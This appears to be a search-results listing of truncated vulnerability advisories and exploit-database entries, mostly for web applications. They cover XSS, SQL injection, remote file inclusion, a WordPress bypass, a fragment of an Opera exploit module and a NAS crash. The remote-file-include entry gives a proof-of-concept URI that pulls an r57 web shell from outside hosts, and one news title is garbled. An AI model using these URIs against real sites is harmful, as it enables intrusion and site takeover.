321 matches found
A Close Look at an Exploit Pack
If you happen to stumble upon a Web site that freaks out your anti-virus program, chances are good that the page you’ve visited is part of a malicious or hacked site that has been outfitted with what’s known as an “exploit pack.” Read the full article. KrebsonSecurity...
DigitalHive - 'mt' Cross-Site Scripting
source: https://www.securityfocus.com/bid/37697/info DigitalHive is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context o...
Java vulnerabilities just to be on the attack code then we to-vulnerability warning-the black bar safety net
Using the Java virtual machine if you have not installed the Sun for Mac OS X, Windows, Linux with the latest security update, now will be a make up for the fault of timing. A security researcher local time on Thursday released a derived from the Mac OS X Java Runtime Environment vulnerability...
Joomla! Component com_mygallery - 'cid' SQL Injection
Bugtraq ID: 37121 Class: Input Validation Error Published: Feb 21 2008 12:00AM Updated: Nov 24 2009 10:15PM Credit: S@BUN Vulnerable: Joomla commygallery 0 The 'commygallery' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied...
Joomla! 'com_mygallery' Component 'cid' Parameter SQL Injection Vulnerability
No description provided by source. Bugtraq ID: 37121 Class: Input Validation Error Published: Feb 21 2008 12:00AM Updated: Nov 24 2009 10:15PM Credit: S@BUN Vulnerable: Joomla commygallery 0 The 'commygallery' component for Joomla! is prone to an SQL-injection vulnerability because it fails to...
Article Directory Index.PHP Remote File Include Vulnerability
No description provided by source. An attacker can exploit this issue via a browser. The following proof-of-concept URI is available: http://www.example.com/index.php?page=http://www.example2.com/r57.txt?http://www.goodayelinks.com/index.php?page=http://www.nykola.ch/Sefirotr0x/r57.txt?...
Article Directory Index.PHP Remote File Include Vulnerability
Article Directory Index.PHP Remote File Include Vulnerability. Webapps exploit for php platform An attacker can exploit this issue via a browser. The following proof-of-concept URI is available:...
Article Directory Index.PHP Remote File Include Vulnerability
Exploit for unknown platform in category web applications ============================================================= Article Directory Index.PHP Remote File Include Vulnerability ============================================================= An attacker can exploit this issue via a browser. The...
WordPress 2.0 2.7.1 - admin.php Module Configuration Security Bypass
WordPress 2.0 2.7.1 - admin.php Module Configuration Security Bypass An attacker can exploit this issue via a browser. The following example URIs are available: http://www.example.com/wp-admin/admin.php?page=/collapsing-archives/options.txt...
WordPress 2.0 - 2.7.1 admin.php Module Configuration Security Bypass
Exploit for unknown platform in category web applications ================================================================================== WordPress 2.0 - 2.7.1 admin.php Module Configuration Security Bypass Vulnerability...
WordPress Core 2.0 < 2.7.1 - 'admin.php' Module Configuration Security Bypass
An attacker can exploit this issue via a browser. The following example URIs are available: http://www.example.com/wp-admin/admin.php?page=/collapsing-archives/options.txt http://www.example.com/wp-admin/admin.php?page=akismet/readme.txt...
Wowd - 'index.html' Multiple Cross-Site Scripting Vulnerabilities
source: https://www.securityfocus.com/bid/42327/info Wowd search client is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting use...
Researcher Publishes Valid Wildcard SSL Certificate
In the wake of Moxie Marlinspike’s SSL talk at Black Hat this summer, another security researcher has used the technique described in the talk to create and publish a valid wildcard certificate and private key that could be used to fool browsers into believing a site is legitimate when it is in...
Match Agency BiZ - 'report.php?pid' Cross-Site Scripting
source: https://www.securityfocus.com/bid/42976/info Datetopia Match Agency BiZ is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser o...
Opera 9 Configuration Overwrite
Opera web browser in versions HttpClients::OPERA, :uamaxver = "9.10", :osname = OperatingSystems::Match::WINDOWS, OperatingSystems::Match::LINUX , :javascript = true, :rank = ExcellentRanking, reliable cmd exec, cleans up after itself :vulntest = nil, def initializeinfo = superupdateinfoinfo,...
x10 MP3 Automatic Search Engine 1.6.5b - video_listing.php?key Cross-Site Scripting
x10 MP3 Automatic Search Engine 1.6.5b - videolisting.php?key Cross-Site Scripting source: https://www.securityfocus.com/bid/43336/info x10 Media Automatic MP3 Search Engine is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An...
HotScripts Type PHP Clone Script - index.php?msg Cross-Site Scripting
HotScripts Type PHP Clone Script - index.php?msg Cross-Site Scripting source: https://www.securityfocus.com/bid/43519/info Hotscripts Type PHP Clone Script is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker may...
68 Classifieds 4.1 - login.php Cross-Site Scripting
68 Classifieds 4.1 - login.php Cross-Site Scripting source: https://www.securityfocus.com/bid/36208/info '68 Classifieds' is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary...
NTSOFT BBS E-Market Professional - Multiple Cross-Site Scripting Vulnerabilities (1)
NTSOFT BBS E-Market Professional - Multiple Cross-Site Scripting Vulnerabilities 1 source: https://www.securityfocus.com/bid/35893/info NTSOFT BBS E-Market Professional is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. An...
Addonics NAS Adapter (bts.cgi) Remote DoS Exploit (post-auth)
Remote: Yes Local: No Credit: Mike Cyr, aka h00die Vulnerable: NASU2FW41 Loader 1.17 Not Vulnerable: Discussion: Addonics NAS Adapter Post-Auth DoS Addonics NAS Adapter is prone to several post authentication buffer overflows. Each of these buffer overflows will crash the entire TCP/IP stack and...